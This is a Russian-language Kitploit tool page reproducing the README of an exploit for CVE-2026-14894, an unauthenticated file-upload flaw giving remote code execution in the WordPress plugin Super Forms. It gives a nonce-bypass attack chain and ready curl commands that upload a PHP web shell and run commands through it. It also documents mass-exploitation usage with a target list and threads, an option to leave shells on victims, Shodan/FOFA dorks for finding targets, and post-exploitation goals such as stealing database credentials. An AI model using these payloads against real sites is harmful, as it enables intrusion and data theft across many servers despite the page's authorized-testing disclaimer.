Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-14894 — Super Forms Неаутентифицированная загрузка файлов RCE | CVSS 9.8 | Kitploit
Инструменты/GitHubGitHub/shinthink/cve-2026-14894
РазведкаГенерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииВеб-безопасностьТестирование на ПроникновениеОбучение и Образование
GitHubshinthink/cve-2026-14894

CVE-2026-14894

Super Forms Неаутентифицированная загрузка файлов RCE | CVSS 9.8

1111 месяц назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий

CVE-2026-14894 — неаутентифицированная загрузка файлов и RCE в Super Forms

Утечка nonce → загрузка datauristring → выполнение кода


Обзор

CVE-2026-14894 — это критическая (CVSS 9.8) неаутентифицированная уязвимость произвольной загрузки файлов в WordPress-плагине Super Forms – Drag & Drop Form Builder (от WebRehab) версий ≤ 6.3.313.

AJAX-обработчик super_submit_form с nopriv принимает загрузку файлов через отправку форм без:

  1. Проверки аутентификации пользователя
  2. Проверки типа или расширения файла
  3. Сверки MIME-содержимого с magic-байтами

Барьер nonce тривиально обходится: отдельный nopriv AJAX-обработчик (super_create_nonce) генерирует валидные nonce для любого неаутентифицированного посетителя.

Атакующие загружают произвольные PHP-файлы через полезные нагрузки datauristring, закодированные в Base64, которые записываются напрямую в /wp-content/uploads/superforms/ с именем файла, контролируемым атакующим, — что приводит к непосредственному выполнению кода.

Затронутые версии

ВерсияСтатус
≤ 6.3.313Уязвима
6.3.314+Исправлена

Активных установок: 600 000+
Обнаружил: andrea bocchetti через Wordfence (7 июля 2026 г.)


Механизм уязвимости

Первопричина

В AJAX-обработчике загрузки файлов в Super Forms отсутствуют три проверки безопасности:

root@kitploit:~
// Vulnerable: nopriv AJAX — no auth, no file type validation, no MIME check
add_action('wp_ajax_nopriv_super_create_nonce', 'super_create_nonce');  // nonce for anyone
add_action('wp_ajax_nopriv_super_submit_form', 'super_submit_form');   // upload for anyone

function super_submit_form() {
    $data = json_decode(stripslashes($_POST['data']), true);
    $file = $data['sf_upload_field']['files'][0];
    $content = base64_decode($file['datauristring']);  // no MIME validation
    $name = $file['value'];                             // no filename sanitization
    fwrite(fopen($upload_path . $name, 'w'), $content); // PHP written to disk
}

Обход nonce

root@kitploit:~
// Anyone can get a valid nonce — no authentication required
function super_create_nonce() {
    $nonce = md5(uniqid(rand(), true));
    $_SESSION['sf_nonce'] = $nonce;
    echo $nonce;  // returned to unauthenticated attacker
}

Схема атаки

root@kitploit:~
1. POST /wp-admin/admin-ajax.php?action=super_create_nonce
   → Get valid nonce (no auth needed)

2. POST /wp-admin/admin-ajax.php?action=super_submit_form
   sf_nonce=NONCE&form_id=1&data={"sf_upload_field":{"files":[{
     "datauristring":"data:image/png;base64,PD9waHAgc3lzdGVt...",
     "value":"shell.php"}]}}
   → Shell written to /wp-content/uploads/superforms/

3. GET /wp-content/uploads/superforms/shell.php?c=id
   → RCE confirmed

Установка

root@kitploit:~
git clone https://github.com/shinthink/CVE-2026-14894.git
cd CVE-2026-14894
pip install -r requirements.txt

Использование

root@kitploit:~
# Single target
python cve_2026_14894.py -t target.com

# Mass exploit
python cve_2026_14894.py -f targets.txt

# Mass exploit + save results
python cve_2026_14894.py -f targets.txt -o shells.txt

# Leave shells on target
python cve_2026_14894.py -t target.com --no-cleanup

# Debug mode (show every request)
python cve_2026_14894.py -t target.com --debug

Аргументы

root@kitploit:~
  -t, --target      Single target (domain or IP)
  -f, --file        Target list, one per line
  -o, --output      Save RCE results to file
  --threads         Concurrent workers (default: 30)
  --no-cleanup      Leave shells on target
  --debug           Show every HTTP request + stage in real-time
  -v, --verbose     Show detailed output

Доказательство концепции (PoC)

Одиночная цель

root@kitploit:~
$ python cve_2026_14894.py -t target.com --debug
root@kitploit:~
  Super Forms | CVE-2026-14894 | CVSS 9.8

  [target.com] [+] Super Forms detected v6.3.312
  [target.com] [*] Nonce obtained
  [target.com] [*] Uploading shell...
  [target.com] [!] RCE confirmed

  Host       : target.com
  SuperForms : YES v6.3.312
  Upload     : YES
  RCE        : YES
  Shell      : https://target.com/wp-content/uploads/superforms/think_abc.php?t=TOKEN
  Output     : uid=33(www-data) gid=33(www-data)
  Time       : 2.1s

Массовое сканирование

root@kitploit:~
  Targets: 2500  |  Threads: 30

  [RCE]    target-vuln-01.com                                 2.1s  v6.3.312
  [UP]     target-patched-02.com                              1.8s  v6.3.314 (upload blocked)
  [!]      target-no-plugin-03.com                            0.5s  not installed
  [150/2500] 6%  |  SuperForms:47  Upload:18  RCE:12

  ───────────────────────────────────────────────────────
  Done | 180s | Targets:2500 Det:47 Upload:18 RCE:12

Ручная эксплуатация

Шаг 1 — Получение nonce

root@kitploit:~
curl -sk -X POST 'https://target.com/wp-admin/admin-ajax.php' \
  -d 'action=super_create_nonce'
# Returns 96-char hex nonce

Шаг 2 — Загрузка PHP-шелла

root@kitploit:~
NONCE="abc123..."
SHELL_B64=$(echo '<?php system($_GET["c"]); ?>' | base64 -w0)

curl -sk -X POST 'https://target.com/wp-admin/admin-ajax.php' \
  -d 'action=super_submit_form' \
  -d "sf_nonce=$NONCE" \
  -d 'form_id=1' \
  -d 'data={"sf_upload_field":{"type":"files","files":[{"datauristring":"data:image/png;base64,'$SHELL_B64'","value":"shell.php","name":"shell.php","label":"attachment"}]}}'

Шаг 3 — Выполнение команд

root@kitploit:~
curl -sk 'https://target.com/wp-content/uploads/superforms/shell.php?c=id'

FOFA Dork

root@kitploit:~
body="wp-content/plugins/super-forms"

Shodan

root@kitploit:~
http.html:"super-forms"

Влияние

Успешная эксплуатация приводит к удалённому выполнению кода с правами пользователя веб-сервера. Далее можно:

  • Извлечь wp-config.php → учётные данные базы данных
  • Получить доступ ко всему содержимому WordPress, пользователям и данным плагинов
  • Развернуть постоянные бэкдоры
  • Перемещаться по внутренним сетям (pivot)

Отказ от ответственности

ТОЛЬКО ДЛЯ ОБРАЗОВАТЕЛЬНЫХ ЦЕЛЕЙ И АВТОРИЗОВАННОГО ТЕСТИРОВАНИЯ.

Данное ПО предназначено для специалистов по безопасности, проводящих авторизованные тесты на проникновение, организаций, проверяющих собственную инфраструктуру, и исследователей, изучающих эксплуатацию уязвимостей.

Несанкционированный доступ к компьютерным системам незаконен и может нарушать:

  • США: Computer Fraud and Abuse Act (18 U.S.C. 1030)
  • Индонезия: UU ITE Pasal 30 & 46
  • Европейский союз: Директива 2013/40/EU
  • Великобритания: Computer Misuse Act 1990

Авторы не несут ответственности за неправомерное использование.


Ссылки

РесурсСсылка

Этот проект не связан с WebRehab или Super Forms.

Скачать инструмент
Консультация Wordfence
wordfence.com
Консультация IONIXionix.io
Запись в NVDCVE-2026-14894
Исследовательandrea bocchetti